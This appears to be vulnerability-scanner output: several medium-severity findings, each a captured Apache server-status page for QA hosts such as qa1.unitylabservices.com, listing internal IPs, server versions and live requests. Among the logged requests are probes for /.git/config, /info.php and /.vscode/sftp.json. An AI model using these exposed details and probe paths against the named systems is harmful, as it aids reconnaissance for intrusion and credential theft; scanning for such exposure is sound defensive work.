0.08245911318121.70.300.43 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.2021.10.0.css H 21-016821/13/105K 0.132920101852.80.381.14 10.253.106.148http/1.1qa1.thermofisher.in:80GET /chemicals/en/layout/scientific/jcr:content/footer-par.html 22-063090/0/71_ 0.00289086010.00.001.14 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0311321/8/42K 0.002922733750.80.010.19 10.253.106.148http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 24-063100/0/96_ 0.002880116940.00.001.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-063110/0/79_ 0.00288099120.00.000.89 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-014000/5/102R 0.004603897370.00.011.44 10.253.106.135http/1.1 27-014100/9/41R 0.00462066470.00.010.49 10.253.106.135http/1.1 28-0243700/47/76R 0.044614437550.00.210.40 10.253.106.148http/1.1 29-016840/4/92R 0.005989133170.00.002.86 10.253.106.148http/1.1 30-014123/8/86K 0.04241021037840.90.092.78 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2021. 31-014130/4/44R 0.00598036770.00.000.07 10.253.106.148http/1.1 32-063120/0/175_ 0.002880143920.00.002.22 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-063130/0/61_ 0.002880106820.00.001.54 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-065030/0/174_ 0.0084098290.00.004.22 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-0243727/81/110K 0.262425310845517.10.661.17 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/common.min.2021.10.0.js H 36-065040/0/99_ 0.00840126530.00.002.16 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-0316600/19/81R 0.024600179680.00.041.30 10.253.106.148http/1.1 38-0178650/89/97R 0.274601040080.01.281.41 10.253.106.135http/1.1 39-023820/5/93_ 0.142091255380.00.451.85 10.253.106.148http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 40-065630/0/88_ 0.0024073530.00.001.41 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-059250/0/56_ 0.0014707210.00.000.53 10.253.106.135http/1.1 42-0126483/108/121K 0.282890102793.41.821.86 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2023. 43-023841/11/64K 0.032474345211.10.110.31 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2021.10.0. 44-059260/0/80_ 0.00147059310.00.000.66 10.253.106.135http/1.1 45-023850/0/57_ 0.00157039010.00.000.61 10.253.106.135http/1.1 46-065640/0/74_ 0.0023051240.00.000.67 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-023970/0/78_ 0.00156084790.00.004.18 10.253.106.148http/1.1 48-065650/0/562_ 0.00230190760.00.004.96 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 49-0326050/11/96R 0.004620109310.00.011.05 10.253.106.135http/1.1 50-028190/0/131R 0.00732084850.00.002.61 10.253.106.148http/1.1 51-059270/0/49_ 0.00147011540.00.000.88 10.253.106.135http/1.1 52-059280/0/162_ 0.001470192580.00.0010.63 10.253.106.135http/1.1 53-028226/6/93K 0.00290
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c33de1f37
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 28-Aug-2023 17:27:23 EDT Restart Time: Friday, 25-Aug-2023 14:04:22 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 3 days 3 hours 23 minutes 1 second Server load: 0.14 0.07 0.01 Total accesses: 81668 - Total Traffic: 700.1 MB - Total Duration: 2534328 CPU Usage: u14.08 s33.87 cu94.55 cs30.11 - .0636% CPU load .301 requests/sec - 2705 B/second - 8.8 kB/request - 31.0321 ms/request 33 requests currently being processed, 36 idle workers R.R_RRR___R_RR__K_K____RK___K_KK_.__R_KR__RRKRR_KR____K_RK_R__R_ RW_R__..._...................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0196610/0/344R 0.005760234560.00.003.79 10.253.106.148http/1.1 1-0-0/0/365. 0.00170197110.00.003.46 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 2-0159750/0/9393R 0.006840125000.00.0018.22 10.253.106.148http/1.1 3-0204000/1/9198_ 0.008076320.00.0018.05 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 4-0159760/1/389R 0.0068441711020.00.005.09 10.253.106.135http/1.1 5-0196620/0/459R 0.005760468430.00.0013.10 10.253.106.148http/1.1 6-0170800/14/450R 0.0457211429290.00.233.58 10.253.106.135http/1.1 7-0181310/2/432_ 0.0080622740.00.0025.65 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 8-0199710/0/480_ 0.001640509900.00.0043.64 10.253.106.135http/1.1 9-0181320/14/425_ 0.1480266120.00.473.44 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 10-0181330/0/390R 0.005720172420.00.007.50 10.253.106.148http/1.1 11-0204010/1/377_ 0.0080293050.00.008.62 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 12-0196630/0/284R 0.005760201380.00.003.77 10.253.106.148http/1.1 13-0196670/0/404R 0.005760338880.00.006.34 10.253.106.148http/1.1 14-0170830/16/435_ 0.0180619930.00.0211.83 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 15-0192630/1/303_ 0.002671875690.00.001.54 10.253.106.148http/1.1 16-0159817/7/391K 0.0226712560462.10.063.89 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.2022.6.17 17-0204020/1/342_ 0.0080217210.00.005.33 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 18-0196681/1/325K 0.0027862753619.10.023.92 10.253.106.148http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.html HTTP/1.1 19-0181340/9/429_ 0.0080114570.00.037.99 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 20-0204060/1/297_ 0.0080273620.00.007.60 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 21-0204070/1/419_ 0.0080254750.00.0029.59 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 22-0159830/33/508_ 0.2416214582050.00.7210.63 10.253.106.135http/1.1 23-0196690/0/500R 0.0057601084830.00.0010.84 10.253.106.148http/1.1 24-01967019/19/427K 0.17249044336545.90.534.96 10.253.106.148http/1.1qa1.thermofisher.in:80GET /content/india-chemicals/en/error/404/jcr:content/content-p 25-0192670/2/522_ 0.0080575430.00.007.08 10.253.99.247http/1.1qa1.allergyinsider.com:80GET /dispatcher/invalidate.cache HTTP/1.1 26-0204110/1/495_ 0.0080322530.00.0010.24 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 27-0199720/1/474_ 0.0016411154060.00.0016.67 10.253.106.135http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 28-0196762/2/344K 0.002510354355.30.015.38 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.2023.7.1. 29-0204120/1/372_ 0.0080209590.00.004.84 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 30-0182542/6/319K 0.002510171817.10.0211.69 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2023.7.1.4 31-0182551/7/266K 0.0127842144440.80.013.04 10.253.106.148http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 32-0127710/4/426_ 0.0128437670.00.0113.28 10.253.106.135http/1.1 33-0-0/0/341. 0.001610286420.00.0010.83 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0199730/0/303_ 0.001640181550.00.004.50 10.253.106.135http/1.1 35-0204130/1/352_ 0.0080226430.00.005.95 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 36-0204170/0/287R 0.002750177680.00.003.84 10.253.106.135http/1.1 37-0184160/0/300_ 0.0020240450.00.004.93 10.253.106.135http/1.1 38-0184171/10/279K 0.04251292500442.00.113.62 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2023. 39-0184180/2/322R 0.0068425239880.04.577.24 10.253.106.148http/1.1 40-0184190/0/275_ 0.0010530910.00.005.28 10.253.106.135http/1.1 41-0184200/0/364_ 0.0010654360.00.004.42 10.253.106.135http/1.1 42-0184210/0/360R 0.006980205450.00.004.40 10.253.106.135http/1.1 43-0204180/0/336R 0.002750105730.00.0010.52 10.253.106.135http/1.1 44-01933118246/18246/18361K 11.31202403933382.332.6033.31 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 45-0204190/0/433R 0.002750618090.00.004.08 10.253.106.135http/1.1 46-0204200/0/343R 0.002750190120.00.005.89 10.253.106.135http/1.1 47-092530/30/396_ 0.39180183630.01.4345.49 10.253.106.148http/1.1 48-0153074/13/444K 0.0327734865753.40.075.65 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2020.1.0.c 49-0204210/0/423R 0.002740317150.00.008.73 10.253.106.135http/1.1 50-0204220/0/331_ 0.002740134000.00.005.31 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 51-0120990/2/282_ 0.0016418660660.00.003.83 10.253.106.135http/1.1 52-0153080/14/327_ 0.05222229100.00.10
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c5dea34ae
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 26-Aug-2023 13:51:49 EDT Restart Time: Friday, 25-Aug-2023 14:04:22 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 23 hours 47 minutes 27 seconds Server load: 0.00 0.00 0.00 Total accesses: 28520 - Total Traffic: 227.3 MB - Total Duration: 1450152 CPU Usage: u7.25 s11.79 cu36.45 cs9.98 - .0764% CPU load .333 requests/sec - 2782 B/second - 8.2 kB/request - 50.8468 ms/request 36 requests currently being processed, 34 idle workers __KKRR___RRRRR_RRRR__RRKR_R___R_R_R_KWRK_______RRR____RR_____RR_ _..R..R._RR..................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0176460/0/141_ 0.00158075260.00.001.51 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 1-0176510/0/131_ 0.001480131670.00.002.16 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 2-06048564/8564/8564K 5.2990525715568.415.2015.20 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 3-06058565/8565/8565K 5.2720526315570.215.2115.21 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0144310/3/151R 0.0026241607400.00.002.07 10.253.106.161http/1.1 5-0169490/0/193R 0.002440350350.00.004.92 10.253.106.161http/1.1 6-0176520/0/191_ 0.001470198420.00.001.19 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-0176530/0/224_ 0.001470419500.00.0023.73 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0108110/0/159_ 0.00243069540.00.004.33 10.253.106.161http/1.1 9-091160/0/206R 0.00262098490.00.001.32 10.253.106.161http/1.1 10-0162140/0/184R 0.00279092350.00.002.61 10.253.106.161http/1.1 11-0132360/7/148R 0.01244084270.00.062.49 10.253.106.216http/1.1 12-0162150/0/118R 0.00279028540.00.000.56 10.253.106.161http/1.1 13-0173480/0/152R 0.005470116880.00.002.70 10.253.106.216http/1.1 14-0132380/25/228_ 0.12200367440.01.198.87 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/phadia_foo 15-0173490/0/145R 0.00546036410.00.000.83 10.253.106.216http/1.1 16-0104390/8/142R 0.00244096290.00.012.12 10.253.106.161http/1.1 17-0156010/0/138R 0.00279079420.00.002.44 10.253.106.161http/1.1 18-0173500/0/125R 0.005460163020.00.002.39 10.253.106.161http/1.1 19-0144780/30/218_ 0.036939140.00.184.55 10.253.106.161http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 20-0177490/0/100_ 0.0013045090.00.001.27 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-058330/10/135R 0.0126213130280.00.022.15 10.253.106.216http/1.1 22-0162170/0/231R 0.002790388600.00.005.69 10.253.106.161http/1.1 23-0173511/1/252K 0.0015916864841.60.004.90 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 24-0173520/0/215R 0.005460218990.00.003.04 10.253.106.216http/1.1 25-0162520/12/173_ 0.05243391420.00.141.96 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap.min.js HTTP/1.1 26-0164400/0/209R 0.00243065910.00.003.59 10.253.106.216http/1.1 27-0164410/0/156_ 0.00243090120.00.0013.67 10.253.106.161http/1.1 28-0164420/0/137_ 0.002430195640.00.001.44 10.253.106.161http/1.1 29-0177500/0/161_ 0.0012083470.00.002.16 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-0108190/0/100R 0.00243071790.00.001.66 10.253.106.216http/1.1 31-0108200/1/91_ 0.00243075740.00.000.81 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/phadia_foo 32-0173540/0/164R 0.005450225320.00.003.75 10.253.106.161http/1.1 33-0177510/0/136_ 0.00120190330.00.002.60 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0173560/0/153R 0.005450132660.00.002.25 10.253.106.161http/1.1 35-0177520/0/95_ 0.0011033750.00.001.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0173575/5/114K 0.001484117776.50.012.46 10.253.106.161http/1.1qa1.allergyinsider.com:80POST / HTTP/1.1 37-0883612/14/158W 0.01001350514.20.021.89 10.253.106.161http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 38-0145900/1/113R 0.0026220176570.00.001.56 10.253.106.216http/1.1 39-0164485/9/177K 0.0141357226.70.040.90 10.253.106.216http/1.1www-qa.patheon.jp:80GET /info.php HTTP/1.1 40-0177530/0/69_ 0.0011052620.00.000.88 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0108260/11/181_ 0.012430617230.00.282.33 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/phadia_foo 42-0177540/0/93_ 0.00110105550.00.001.05 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0177550/0/93_ 0.0011013090.00.001.13 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0177560/0/114_ 0.00100127760.00.000.71 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0177570/0/175_ 0.00100272310.00.001.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-0177580/0/113_ 0.0010088880.00.001.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0132520/13/144R 0.01262831550.00.022.19 10.253.106.161http/1.1 48-0132530/9/121R 0.0124413213730.00.022.49 10.253.106.161http/1.1 49-0173620/0/143R 0.005440120620.00.001.64 10.253.106.216http/1.1 50-0177590/0/130_ 0.0010080860.00.003.20 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 51-0177600/0/130_ 0.00100571700.00.000.60 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-0164520/1/159_ 0.002431695010.00.001.13 10.253.106.161http/1.1 53-0164530/0/178_ 0.002430202570.00.003.03 10.253.106.216http/1.1 54-0164540/0/155R 0.002430
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c079095fb
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 25-Aug-2023 06:19:22 EDT Restart Time: Tuesday, 15-Aug-2023 10:38:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 9 days 19 hours 40 minutes 59 seconds Server load: 0.00 0.00 0.00 Total accesses: 270750 - Total Traffic: 2.6 GB - Total Duration: 11134996 CPU Usage: u65.64 s116.59 cu347.72 cs91.53 - .0732% CPU load .319 requests/sec - 3302 B/second - 10.1 kB/request - 41.1265 ms/request 37 requests currently being processed, 40 idle workers __RKKR__RR_R_RKR___RRRRRR_R____R___R__RRRRRRR_WRK_RR_K__R___RR__ __R_________.R.................................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-031720/0/1500_ 0.00702030630.00.0075.03 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 1-031730/0/1509_ 0.00601895810.00.0053.10 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 2-0322250/0/1431R 0.0035901716270.00.0063.43 10.253.106.161http/1.1 3-01726119310/84846/84846K 51.665051742155569.2151.92151.92 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-01726219310/84846/84846K 51.682051434155568.6151.92151.92 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0322260/1/1528R 0.00359191084520.00.0030.96 10.253.106.161http/1.1 6-031740/0/1347_ 0.0060946590.00.0019.81 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-031790/0/1411_ 0.0050774830.00.0033.10 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0326940/1/1477R 0.223582321546220.00.4052.53 10.253.106.161http/1.1 9-0326950/2/1456R 0.0035601250460.00.0038.27 10.253.106.161http/1.1 10-031800/0/1368_ 0.00501694150.00.0027.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-0326970/1/1647R 0.0035691449990.00.0035.62 10.253.106.161http/1.1 12-031810/0/1590_ 0.00501053930.00.0030.14 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 13-0326980/0/1518R 0.0058301578710.00.0035.61 10.253.106.161http/1.1 14-0299745/5/1445K 0.00414940366.70.0126.69 10.253.106.161http/1.1www-qa.patheon.jp:80GET /info.php HTTP/1.1 15-06950/0/1645R 0.0066202747620.00.0037.36 10.253.106.161http/1.1 16-0299750/4/1330_ 0.00196301072120.00.0128.96 10.253.106.161http/1.1 17-031820/0/1132_ 0.00501014560.00.0019.78 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-06960/16/1488_ 0.01592086590.00.0233.31 10.253.106.161http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 19-07160/2/1504R 0.00583191712420.00.0017.74 10.253.106.216http/1.1 20-07170/10/1360R 0.00217121408330.00.0126.83 10.253.106.216http/1.1 21-0307760/16/1437R 0.47358101960050.00.8251.24 10.253.106.161http/1.1 22-0323160/49/1356R 0.17351131348630.02.3826.38 10.253.106.216http/1.1 23-0323170/0/1514R 0.0035602159600.00.0032.32 10.253.106.161http/1.1 24-0323180/1/1461R 0.00352141424000.00.0033.92 10.253.106.216http/1.1 25-0307770/3/1462_ 0.00511591224630.00.0920.67 10.253.106.216http/1.1 26-0323190/0/1221R 0.003560954570.00.0016.55 10.253.106.161http/1.1 27-0314500/10/1326_ 0.02196112051410.00.1234.47 10.253.106.161http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 28-031830/0/1150_ 0.00401503060.00.0022.04 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0307820/0/1937_ 0.0021701134210.00.0029.21 10.253.106.216http/1.1 30-031840/0/1221_ 0.00401947120.00.0017.67 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0307830/15/1258R 0.01677171630970.00.7032.97 10.253.106.216http/1.1 32-031850/0/1628_ 0.00401073590.00.0043.21 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-0307840/8/1245_ 0.134601025250.00.4024.19 10.253.106.161http/1.1 34-031860/0/1324_ 0.00401077830.00.0021.37 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-027810/0/2031R 0.0052204058270.00.0021.34 10.253.106.216http/1.1 36-031870/0/996_ 0.00401672790.00.0012.90 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-0307870/3/1247_ 0.005161412990.00.1030.71 10.253.106.216http/1.1 38-0327010/0/1353R 0.0041101095770.00.0027.65 10.253.106.161http/1.1 39-0270730/5/1312R 0.0531071321370.00.1426.13 10.253.106.216http/1.1 40-0299870/1/1825R 0.00352151589350.00.3044.07 10.253.106.216http/1.1 41-0314530/3/1169R 0.0135961289330.00.1119.96 10.253.106.161http/1.1 42-0314540/16/1430R 0.0142101664800.00.0925.86 10.253.106.216http/1.1 43-0314550/2/1337R 0.00356171469430.00.0027.07 10.253.106.161http/1.1 44-027870/0/1317R 0.0050101401520.00.0018.87 10.253.106.216http/1.1 45-031880/0/1371_ 0.00401007570.00.0029.87 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-0327027/8/1562W 0.010014199711.10.0134.87 10.253.106.216http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 47-0314570/0/1299R 0.0038801450110.00.0020.06 10.253.106.161http/1.1 48-0307882/5/1273K 0.008421586031.80.0272.47 10.253.106.216http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 49-031890/0/1439_ 0.00401897260.00.0049.06 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-07270/0/1207R 0.004210941520.00.0024.33 10.253.106.216http/1.1 51-0327050/0/1133R 0.0042101322050.00.0021.25 10.253.106.216http/1.1 52-031900/0/1361_ 0.00402480630.00.0023.16 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 53-07289/9/1289K 0.0134116660210.00.0133.49 10.253.106.216http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 54-031910/0/1557_ 0.00301960580.00.0026.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HT
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c1eaa2d57
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 24-Aug-2023 02:40:14 EDT Restart Time: Tuesday, 15-Aug-2023 10:38:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 8 days 16 hours 1 minute 51 seconds Server load: 0.00 0.02 0.00 Total accesses: 240528 - Total Traffic: 2.3 GB - Total Duration: 10287872 CPU Usage: u57.57 s102.96 cu308.15 cs81.31 - .0734% CPU load .321 requests/sec - 3361 B/second - 10.2 kB/request - 42.772 ms/request 38 requests currently being processed, 40 idle workers __RKKR_R_.__RK_RRRRRRR_.._____R__R_RKR__RR_R__RRR__RRR_RRRRR___W R____RRR________._.............................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-069620/0/1278_ 0.002001938680.00.0065.92 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 1-069630/0/1356_ 0.001901838600.00.0050.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 2-054270/8/1178R 0.00660131503890.00.0252.02 10.253.106.161http/1.1 3-0172619355/74891/74891K 45.547045643137272.2134.05134.05 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0172629355/74891/74891K 45.584045366137271.7134.05134.05 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-054280/16/1387R 0.0249819996250.00.0728.85 10.253.106.216http/1.1 6-069640/0/1203_ 0.00190885040.00.0018.80 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-054290/0/1258R 0.007180708900.00.0031.74 10.253.106.161http/1.1 8-069790/0/1325_ 0.00801521110.00.0049.61 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 9-0-0/0/1291. 0.00201152000.00.0034.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 10-069800/0/1241_ 0.00701618670.00.0025.49 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-0323670/16/1537_ 0.032121434300.00.1434.15 10.253.106.216http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 12-06160/0/1440R 0.007190972720.00.0028.75 10.253.106.161http/1.1 13-056725/5/1365K 0.004131531566.70.0131.52 10.253.106.161http/1.1www-qa.patheon.jp:80GET /info.php HTTP/1.1 14-069810/0/1289_ 0.0070877600.00.0023.48 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 15-056740/3/1530R 0.00339142647430.00.0035.63 10.253.106.216http/1.1 16-0210100/61/1244R 0.235260997560.01.8327.89 10.253.106.161http/1.1 17-047130/9/1003R 0.254230970820.00.8516.95 10.253.106.216http/1.1 18-047140/2/1312R 0.00527142020130.00.0025.29 10.253.106.161http/1.1 19-056750/0/1366R 0.0022201666810.00.0016.75 10.253.106.216http/1.1 20-040420/1/1178R 0.004239491321630.00.0122.97 10.253.106.216http/1.1 21-040430/1/1303R 0.0036116071889430.00.0248.41 10.253.106.216http/1.1 22-056760/2/1184_ 0.0072551269350.00.0221.72 10.253.106.216http/1.1 23-0-0/0/1332. 0.00002014630.00.0030.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0-0/0/1282. 0.00101101360.00.0029.25 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-056790/0/1285_ 0.0019301096170.00.0017.20 10.253.106.161http/1.1 26-069820/0/1079_ 0.0060837500.00.0014.39 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 27-058310/0/1128_ 0.007201932440.00.0021.19 10.253.106.216http/1.1 28-069830/0/1001_ 